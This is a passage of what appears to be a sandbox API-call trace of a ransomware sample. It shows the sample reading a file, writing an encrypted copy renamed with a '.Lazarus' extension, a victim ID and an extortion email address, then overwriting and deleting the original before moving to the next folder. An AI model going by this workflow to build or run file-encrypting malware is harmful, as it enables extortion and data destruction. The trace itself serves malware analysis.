returned 1 [0067.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.236] AreFileApisANSI () returned 1 [0067.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0067.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.236] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0067.236] AreFileApisANSI () returned 1 [0067.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.236] GetLastError () returned 0x0 [0067.236] SetLastError (dwErrCode=0x0) [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0067.236] GetLastError () returned 0x0 [0067.236] SetLastError (dwErrCode=0x0) [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0067.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0067.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0067.237] AreFileApisANSI () returned 1 [0067.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0067.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0067.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0067.237] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.241] GetFileType (hFile=0x420) returned 0x1 [0067.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0067.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.241] AreFileApisANSI () returned 1 [0067.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0067.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.242] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.242] GetFileType (hFile=0x428) returned 0x1 [0067.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.242] GetLastError () returned 0x0 [0067.242] SetLastError (dwErrCode=0x0) [0067.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.242] GetLastError () returned 0x0 [0067.242] SetLastError (dwErrCode=0x0) [0067.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0067.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.242] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0067.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.283] GetLastError () returned 0x0 [0067.283] SetLastError (dwErrCode=0x0) [0067.284] GetLastError () returned 0x0 [0067.284] SetLastError (dwErrCode=0x0) [0067.284] GetLastError () returned 0x0 [0067.284] SetLastError (dwErrCode=0x0) [0067.284] GetLastError () returned 0x0 [0067.284] SetLastError (dwErrCode=0x0) [0067.284] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.284] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.285] GetLastError () returned 0x0 [0067.285] SetLastError (dwErrCode=0x0) [0067.285] GetLastError () returned 0x0 [0067.285] SetLastError (dwErrCode=0x0) [0067.285] GetLastError () returned 0x0 [0067.285] SetLastError (dwErrCode=0x0) [0067.286] GetLastError () returned 0x0 [0067.286] SetLastError (dwErrCode=0x0) [0067.286] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.286] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.286] GetLastError () returned 0x0 [0067.286] SetLastError (dwErrCode=0x0) [0067.286] GetLastError () returned 0x0 [0067.286] SetLastError (dwErrCode=0x0) [0067.286] GetLastError () returned 0x0 [0067.286] SetLastError (dwErrCode=0x0) [0067.286] GetLastError () returned 0x0 [0067.286] SetLastError (dwErrCode=0x0) [0067.287] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.287] GetLastError () returned 0x0 [0067.287] SetLastError (dwErrCode=0x0) [0067.287] GetLastError () returned 0x0 [0067.287] SetLastError (dwErrCode=0x0) [0067.287] GetLastError () returned 0x0 [0067.287] SetLastError (dwErrCode=0x0) [0067.287] GetLastError () returned 0x0 [0067.287] SetLastError (dwErrCode=0x0) [0067.287] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x958, lpOverlapped=0x0) returned 1 [0067.288] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.288] GetLastError () returned 0x0 [0067.288] SetLastError (dwErrCode=0x0) [0067.288] GetLastError () returned 0x0 [0067.288] SetLastError (dwErrCode=0x0) [0067.288] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.288] GetLastError () returned 0x0 [0067.288] SetLastError (dwErrCode=0x0) [0067.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0067.288] GetLastError () returned 0x0 [0067.288] SetLastError (dwErrCode=0x0) [0067.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0067.289] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x960, lpOverlapped=0x0) returned 1 [0067.289] GetLastError () returned 0x0 [0067.289] SetLastError (dwErrCode=0x0) [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.289] GetLastError () returned 0x0 [0067.289] SetLastError (dwErrCode=0x0) [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0067.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.289] CloseHandle (hObject=0x420) returned 1 [0067.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.291] CloseHandle (hObject=0x428) returned 1 [0067.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0067.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0067.292] AreFileApisANSI () returned 1 [0067.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0067.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.292] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.293] GetFileType (hFile=0x428) returned 0x1 [0067.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0067.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.293] GetLastError () returned 0xb7 [0067.293] SetLastError (dwErrCode=0xb7) [0067.293] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.294] CloseHandle (hObject=0x428) returned 1 [0067.294] AreFileApisANSI () returned 1 [0067.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0067.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0067.294] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 1 [0067.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0067.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0067.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.296] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f1, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ƿ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧肐\x07̧비聐薸\x08賂̧")) returned 0 [0067.296] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0067.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0067.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0067.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.297] AreFileApisANSI () returned 1 [0067.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040", lpUsedDefaultChar=0x0) returned 27 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0067.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0067.297] AreFileApisANSI () returned 1 [0067.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0067.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78690 [0067.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78690, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040") returned 27 [0067.298] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040" (normalized: "c:\\588bce7c90097ed212\\1040"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.298] GetLastError () returned 0x5 [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78690 | out: hHeap=0x20000) returned 1 [0067.298] AreFileApisANSI () returned 1 [0067.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0067.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78150 [0067.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78150, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040") returned 27 [0067.298] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040" (normalized: "c:\\588bce7c90097ed212\\1040"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.298] GetLastError () returned 0x5 [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] GetLastError () returned 0x5 [0067.298] SetLastError (dwErrCode=0x5) [0067.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78150 | out: hHeap=0x20000) returned 1 [0067.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0067.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 